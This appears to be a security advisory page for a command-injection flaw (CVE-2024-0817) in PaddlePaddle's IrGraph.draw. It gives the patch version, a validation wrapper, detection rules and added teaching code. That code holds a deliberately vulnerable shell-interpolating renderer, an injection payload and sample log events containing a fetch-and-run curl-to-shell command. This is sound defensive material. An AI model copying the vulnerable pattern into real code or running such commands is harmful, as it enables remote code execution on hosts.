CVE-2024-0817

7.8 HIGH

📋 TL;DR

This vulnerability is a command injection in the IrGraph.draw function of PaddlePaddle 2.6.0. An attacker who controls the arguments passed to IrGraph.draw (the output path and graph name) can execute arbitrary operating-system commands with the privileges of the Python process. It affects any application that calls this function with values derived from untrusted input; whether that input arrives remotely or locally depends on the application, not on PaddlePaddle.

💻 Affected Systems

Products:
  • PaddlePaddle
Versions: 2.6.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects applications using IrGraph.draw function. PaddlePaddle is a deep learning framework primarily used in AI/ML applications.

📦 What is this software?

PaddlePaddle is an open-source deep learning framework used for training and serving AI/ML models. IrGraph.draw is a developer utility in its Python API that renders an intermediate-representation graph to a file for inspection; it is not part of the normal training or inference path.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full system compromise: the injected command runs with the privileges of the Python process, which on a training or serving host often has access to models, datasets and credentials, leading to data theft, ransomware deployment, or complete system takeover.

🟠 Likely Case

Command execution with the privileges of the application's Python process, potentially leading to data exfiltration or lateral movement within the network.

🟢 If Mitigated

No impact if the arguments passed to IrGraph.draw are never derived from untrusted input (or are strictly validated), if the process is sandboxed, or if the function is not used at all.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details available in public bounty reports. Command injection vulnerabilities are frequently weaponized due to their straightforward exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.6.1 or later

Vendor Advisory: https://github.com/PaddlePaddle/Paddle/security/advisories

Restart Required: No system reboot, but any running Python process that has already imported paddle must be restarted to load the patched code.

Instructions:

1. Update PaddlePaddle to version 2.6.1 or later: pip install --upgrade paddlepaddle (or paddlepaddle-gpu for the GPU build)
2. Update any requirements files, lock files or container images that pin the vulnerable version
3. Test the updated application functionality

🔧 Temporary Workarounds

Input Validation Wrapper

Platform: all

Wrap IrGraph.draw so that the output path and graph name are checked against an allowlist before the call. Rejecting (rather than stripping) unexpected characters is the safer choice: a blacklist of shell metacharacters is easy to bypass (newlines, $(...), and others are not on the list), and stripping can silently turn one valid path into another.

# Python example: validate IrGraph.draw arguments before the call
import re

# Allowlist: letters, digits, underscore, dot, slash and dash only
SAFE = re.compile(r'[A-Za-z0-9_./-]+')

def safe_draw(graph, save_path, name, **kwargs):
    # Reject, don't sanitize: anything outside the allowlist, plus path traversal
    for value in (save_path, name):
        if not SAFE.fullmatch(str(value)) or '..' in str(value):
            raise ValueError(f'unsafe IrGraph.draw argument: {value!r}')
    # graph is the IrGraph instance; draw is an instance method
    return graph.draw(save_path, name, **kwargs)
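To make the mitigation advice concrete, here is an added example (written for this page; not PaddlePaddle's code and not the bounty report's exploit) that contrasts the injection pattern with its hardened form. It uses a hypothetical stand-in renderer with the same argument shape as IrGraph.draw(save_path, name): the vulnerable function interpolates both strings into a shell command for Graphviz's dot, the hardened one allowlists the name and builds an argv list so no shell is involved. The payload and paths are constructed for the demo, and that the affected PaddlePaddle version builds its command exactly this way is an assumption, not something the page states.

```python
import re
import subprocess

# Hypothetical stand-in for a graph renderer with the same argument shape as
# IrGraph.draw(save_path, name). Not PaddlePaddle's code.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def vulnerable_render(save_path: str, name: str) -> str:
    """Vulnerable pattern: untrusted strings interpolated into one shell command line.

    Returns the shell's stdout so the injected command's output is observable.
    """
    dot_file = f"{save_path}/{name}.dot"
    pdf_file = f"{save_path}/{name}.pdf"
    cmd = f"dot -Tpdf {dot_file} -o {pdf_file}"
    # shell=True is the os.system() equivalent: a ';' inside name ends the dot
    # command and whatever follows runs as a second command.
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def hardened_render_argv(save_path: str, name: str) -> list:
    """Hardened form: allowlist the name and build an argv list, so no shell parses it.

    Returns the argv that would be handed to subprocess.run(argv); with no shell in
    the loop, no character in the arguments can terminate or chain a command.
    """
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected graph name {name!r}")
    return ["dot", "-Tpdf", f"{save_path}/{name}.dot", "-o", f"{save_path}/{name}.pdf"]


if __name__ == "__main__":
    # Constructed payload: ends the dot command and appends an attacker-chosen one
    payload = "g; echo INJECTED"
    print(vulnerable_render("/tmp", payload))   # the echo runs; output contains INJECTED
    try:
        hardened_render_argv("/tmp", payload)
    except ValueError as exc:
        print("hardened:", exc)
    print(hardened_render_argv("/tmp", "graph_1"))
```

Removing the shell closes the command injection but does nothing about path traversal through save_path; keep a directory check for that as well, as the wrapper above does.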

🧯 If You Can't Patch

  • Implement network segmentation to isolate PaddlePaddle systems from critical infrastructure
  • Deploy application-level firewalls with command injection detection rules

🔍 How to Verify

Check if Vulnerable:

Check the installed PaddlePaddle version: python -c "import paddle; print(paddle.__version__)" - if the output is 2.6.0 and the application calls IrGraph.draw, it is affected. Then check whether any argument passed to IrGraph.draw (in particular the output path and graph name) can be influenced by untrusted input; that determines whether the flaw is actually exploitable in your deployment.

Check Version:

python -c "import paddle; print(paddle.__version__)"

Verify Fix Applied:

After the update, confirm the version is 2.6.1 or later with the same command, run from the same interpreter or virtualenv the application uses (a different environment may still have 2.6.0 installed).

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in application logs
  • Error messages containing shell metacharacters in IrGraph.draw calls
  • Unexpected subprocess spawns from PaddlePaddle processes

Network Indicators:

  • Outbound connections from PaddlePaddle to unexpected destinations
  • Command and control traffic patterns

SIEM Query:

Generic process-creation query (adapt field names to your schema): a shell spawned by a Python process whose command line contains shell control characters. The parent is python, not paddle, because PaddlePaddle runs inside the interpreter.

parent_process_name:python* AND process_name:(sh OR bash OR dash) AND (command_line:*;* OR command_line:*&* OR command_line:*|* OR command_line:*`* OR command_line:*$(*)

Expect false positives from legitimate shell use by Python tooling; baseline known-good command lines per host and alert on the remainder.
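As an added example (not from the page or the vendor), the following runs the detection idea above over a few constructed process-creation events: flag a shell spawned by a Python process when the command line carries shell control characters, and suppress a known-good chained command so the rule does not fire on every build script. The event schema, paths, addresses and command lines are made up for the demo.

```python
import os
import re

# Constructed process-creation events in a hypothetical EDR/auditd-like schema
# (parent_image, image, command_line). Hosts, paths and URLs are made up.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": "/usr/bin/python3.10", "image": "/bin/sh",
     "command_line": 'sh -c "dot -Tpdf /tmp/g.dot -o /tmp/g.pdf"'},  # benign render
    {"id": 2, "parent_image": "/usr/bin/python3.10", "image": "/bin/sh",
     "command_line": 'sh -c "dot -Tpdf /tmp/g; curl http://198.51.100.7/x | sh.dot '
                     '-o /tmp/g; curl http://198.51.100.7/x | sh.pdf"'},  # injected name
    {"id": 3, "parent_image": "/bin/bash", "image": "/bin/sh",
     "command_line": 'sh -c "ls | wc -l"'},  # not spawned by Python
    {"id": 4, "parent_image": "/usr/bin/python3.10", "image": "/usr/bin/dot",
     "command_line": "dot -Tpdf /tmp/g.dot -o /tmp/g.pdf"},  # renderer run without a shell
    {"id": 5, "parent_image": "/usr/bin/python3.10", "image": "/bin/dash",
     "command_line": 'sh -c "dot -Tpdf /tmp/$(id).dot -o /tmp/x.pdf"'},  # command substitution
    {"id": 6, "parent_image": "/usr/bin/python3.10", "image": "/bin/sh",
     "command_line": 'sh -c "make -j4 && make install"'},  # legitimate chained command
]

SHELLS = {"sh", "bash", "dash", "zsh"}
# Characters that end or chain a command, plus $( for command substitution
METACHARS = re.compile(r"[;&|`]|\$\(")
# Constructed allowlist of command lines known to be legitimate on this host; tune per environment
KNOWN_GOOD = (re.compile(r'^sh -c "make '),)


def is_suspicious(event: dict) -> bool:
    """True when a Python process spawns a shell whose command line carries control characters."""
    parent = os.path.basename(event["parent_image"])
    child = os.path.basename(event["image"])
    cmd = event["command_line"]
    if not parent.startswith("python") or child not in SHELLS:
        return False
    if any(pattern.search(cmd) for pattern in KNOWN_GOOD):
        return False
    return METACHARS.search(cmd) is not None


def triage(events: list) -> list:
    """Return the ids of events worth an analyst's attention, in input order."""
    return [e["id"] for e in events if is_suspicious(e)]


if __name__ == "__main__":
    print("suspicious event ids:", triage(SAMPLE_EVENTS))  # [2, 5]
```

The rule keys on the shell child rather than on the eventual payload process (curl, id) because an injected string always has to pass through a shell to be split into extra commands; the payload process itself may look ordinary. Event 4 shows what a renderer invoked without a shell looks like in the same telemetry, which is also the shape to expect once the call no longer goes through a shell.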
